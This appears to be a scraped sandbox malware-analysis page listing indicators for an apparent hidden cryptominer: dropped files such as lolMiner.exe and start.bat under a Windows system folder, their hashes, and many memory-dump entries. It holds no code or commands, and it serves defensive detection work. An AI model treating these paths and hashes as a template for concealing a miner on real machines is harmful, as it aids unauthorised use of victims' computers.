e22875a0f50eca2fdb41801b054967a428a8a539b5c7720d5e7fba5fcb3f3d456868b693ec5d9f5fd91a5d3bbc9db9c8fdaa25ccaaff3da717eb93c62501ae30

Download Submit
C:\Windows\SysWOW64\ETH\lolMiner.exe
Filesize
10.9MB

MD5
a16b3386d84434140fa3d0b602b5e31e

SHA1
5818807cb5bc14feafa4ee71e8125a6df5969c0d

SHA256
f01e8808ad75cd7ee70316a6097e07c6e79c7dade8651364a3c0e28d2ca924d1

SHA512
e22875a0f50eca2fdb41801b054967a428a8a539b5c7720d5e7fba5fcb3f3d456868b693ec5d9f5fd91a5d3bbc9db9c8fdaa25ccaaff3da717eb93c62501ae30

Download Submit
C:\Windows\SysWOW64\ETH\lolMiner.exe
Filesize
10.9MB

MD5
a16b3386d84434140fa3d0b602b5e31e

SHA1
5818807cb5bc14feafa4ee71e8125a6df5969c0d

SHA256
f01e8808ad75cd7ee70316a6097e07c6e79c7dade8651364a3c0e28d2ca924d1

SHA512
e22875a0f50eca2fdb41801b054967a428a8a539b5c7720d5e7fba5fcb3f3d456868b693ec5d9f5fd91a5d3bbc9db9c8fdaa25ccaaff3da717eb93c62501ae30

Download Submit
C:\Windows\SysWOW64\ETH\lolMiner.exe
Filesize
10.9MB

MD5
a16b3386d84434140fa3d0b602b5e31e

SHA1
5818807cb5bc14feafa4ee71e8125a6df5969c0d

SHA256
f01e8808ad75cd7ee70316a6097e07c6e79c7dade8651364a3c0e28d2ca924d1

SHA512
e22875a0f50eca2fdb41801b054967a428a8a539b5c7720d5e7fba5fcb3f3d456868b693ec5d9f5fd91a5d3bbc9db9c8fdaa25ccaaff3da717eb93c62501ae30

Download Submit
C:\Windows\SysWOW64\ETH\lolMiner.exe
Filesize
10.9MB

MD5
a16b3386d84434140fa3d0b602b5e31e

SHA1
5818807cb5bc14feafa4ee71e8125a6df5969c0d

SHA256
f01e8808ad75cd7ee70316a6097e07c6e79c7dade8651364a3c0e28d2ca924d1

SHA512
e22875a0f50eca2fdb41801b054967a428a8a539b5c7720d5e7fba5fcb3f3d456868b693ec5d9f5fd91a5d3bbc9db9c8fdaa25ccaaff3da717eb93c62501ae30

Download Submit
C:\Windows\SysWOW64\ETH\lolMiner.exe
Filesize
10.9MB

MD5
a16b3386d84434140fa3d0b602b5e31e

SHA1
5818807cb5bc14feafa4ee71e8125a6df5969c0d

SHA256
f01e8808ad75cd7ee70316a6097e07c6e79c7dade8651364a3c0e28d2ca924d1

SHA512
e22875a0f50eca2fdb41801b054967a428a8a539b5c7720d5e7fba5fcb3f3d456868b693ec5d9f5fd91a5d3bbc9db9c8fdaa25ccaaff3da717eb93c62501ae30

Download Submit
C:\Windows\SysWOW64\ETH\lolMiner.exe
Filesize
4.1MB

MD5
7f95dc512b22bfcef6bbc00959eb00f7

SHA1
06fd58b4f213b649ddf18e1995c99043de91889d

SHA256
1432e026384b292c5db3015c73e207da7b01899cc8fc4be56f3019b98bff296f

SHA512
7544705b70b3792457e50113a7a37b16b00f063771175dc830d8ca6a5f819edcf0a4a6d5e46a4fe0d2e4f9508da4e3fd31c18ace8b5ae0220d21c70c55c4c252

Download Submit
C:\Windows\SysWOW64\ETH\start.bat
Filesize
115B

MD5
8ad543d60593668fdb2c37acd7eeda7d

SHA1
c6f2ebbc8d221a58c7d7f1f59461fe61900261b6

SHA256
79df8e1b9ef1aa0864d3292476a8c100de9999cd4311d9c072d1c741b730fa59

SHA512
6d00426580e61ca674f4c89b734c8e520c5d1469031ce1dbbfe96d7d76e4cca20d9a233304440e97ec2b8866420ad273e44975f0d5e792ce438d9843eabcf7bb

Download Submit
memory/456-258-0x0000000000000000-mapping.dmp

Download
memory/572-309-0x0000000000000000-mapping.dmp

Download
memory/704-275-0x0000000000000000-mapping.dmp

Download
memory/704-281-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/768-211-0x0000000000000000-mapping.dmp

Download
memory/768-213-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/808-321-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/864-171-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/864-169-0x0000000000000000-mapping.dmp

Download
memory/1112-291-0x0000000000000000-mapping.dmp

Download
memory/1156-261-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/1156-259-0x0000000000000000-mapping.dmp

Download
memory/1176-250-0x0000000000000000-mapping.dmp

Download
memory/1224-269-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/1224-267-0x0000000000000000-mapping.dmp

Download
memory/1364-221-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/1364-219-0x0000000000000000-mapping.dmp

Download
memory/1372-229-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/1372-227-0x0000000000000000-mapping.dmp

Download
memory/1492-201-0x0000000000000000-mapping.dmp

Download
memory/1628-237-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/1628-235-0x0000000000000000-mapping.dmp

Download
memory/1668-241-0x0000000000000000-mapping.dmp

Download
memory/1680-245-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/1680-243-0x0000000000000000-mapping.dmp

Download
memory/1716-300-0x0000000000000000-mapping.dmp

Download
memory/1720-292-0x0000000000000000-mapping.dmp

Download
memory/1768-273-0x0000000000000000-mapping.dmp

Download
memory/1956-339-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/2088-151-0x0000000000000000-mapping.dmp

Download
memory/2120-144-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/2120-141-0x0000000000000000-mapping.dmp

Download
memory/2244-266-0x0000000000000000-mapping.dmp

Download
memory/2344-209-0x0000000000000000-mapping.dmp

Download
memory/2344-160-0x0000000000000000-mapping.dmp

Download
memory/2396-134-0x0000000000000000-mapping.dmp

Download
memory/2396-139-0x00007FF8B9B80000-0x00007FF8BA641000-memory.dmp

Filesize
10.8MB

Download
memory/2396-137-0x00000201167F0000-0x0000020116802000-memory.dmp

Filesize
72KB

Download
memory/2400-317-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/2400-311-0x0000000000000000-mapping.dmp

Download
memory/2676-242-0x0000000000000000-mapping.dmp

Download
memory/2936-282-0x0000000000000000-mapping.dmp

Download
memory/2968-193-0x0000000000000000-mapping.dmp

Download
memory/2976-293-0x0000000000000000-mapping.dmp

Download
memory/2976-299-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/3052-132-0x0000000000000000-mapping.dmp

Download
memory/3084-329-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/3272-305-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/3272-302-0x0000000000000000-mapping.dmp

Download
memory/3304-234-0x0000000000000000-mapping.dmp

Download
memory/3316-167-0x0000000000000000-mapping.dmp

Download
memory/3328-218-0x0000000000000000-mapping.dmp

Download
memory/3360-176-0x0000000000000000-mapping.dmp

Download
memory/3364-189-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/3364-188-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/3364-186-0x0000000000000000-mapping.dmp

Download
memory/3420-138-0x0000000000000000-mapping.dmp

Download
memory/3476-163-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/3476-161-0x0000000000000000-mapping.dmp

Download
memory/3548-205-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/3548-203-0x0000000000000000-mapping.dmp

Download
memory/3564-153-0x0000000000000000-mapping.dmp

Download
memory/3564-155-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/3628-210-0x0000000000000000-mapping.dmp

Download
memory/3968-253-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/3968-251-0x0000000000000000-mapping.dmp

Download
memory/3984-194-0x0000000000000000-mapping.dmp

Download
memory/4012-249-0x0000000000000000-mapping.dmp

Download
memory/4068-335-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/4108-197-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/4108-195-0x0000000000000000-mapping.dmp

Download
memory/4172-159-0x0000000000000000-mapping.dmp

Download
memory/4268-202-0x0000000000000000-mapping.dmp

Download
memory/4284-257-0x0000000000000000-mapping.dmp

Download
memory/4288-152-0x00007FF8B9D70000-0x00007FF8BA831000-memory.dmp

Filesize
10.8MB

Download
memory/4288-148-0x0000000000000000-mapping.dmp

Download
memory/4304-310-0x0000000000000000-mapping.dmp

Download
memory/4320-175-0x0000000000000000-mapping.dmp

Download
memory/4436-265-0x0000000000000000-mapping.dmp

Download
memory/4452-274-0x0000000000000000-mapping.dmp

Download
memory/4504-226-0x0000000000000000-mapping.dmp

Download
memory/4700-225-0x0000000000000000-mapping.dmp

Download
memory/4760-185-0x0000000000000000-mapping.dmp

Download
memory/4760-233-0x0000000000000000-mapping.dmp

Download
memory/4768-287-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/4768-284-0x0000000000000000-mapping.dmp

Download
memory/4832-179-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/4832-177-0x0000000000000000-mapping.dmp

Download
memory/4832-180-0x0000000140000000-0x0000000141AF5000-memory.dmp

Filesize
27.0MB

Download
memory/4944-283-0x0000000000000000-mapping.dmp

Download
memory/4980-217-0x0000000000000000-mapping.dmp

Download
memory/5032-184-0x0000000000000000-mapping.dmp

Download
memory/5044-301-0x0000000000000000-mapping.dmp

Download
memory/5076-168-0x0000000000000000-mapping.dmp

Download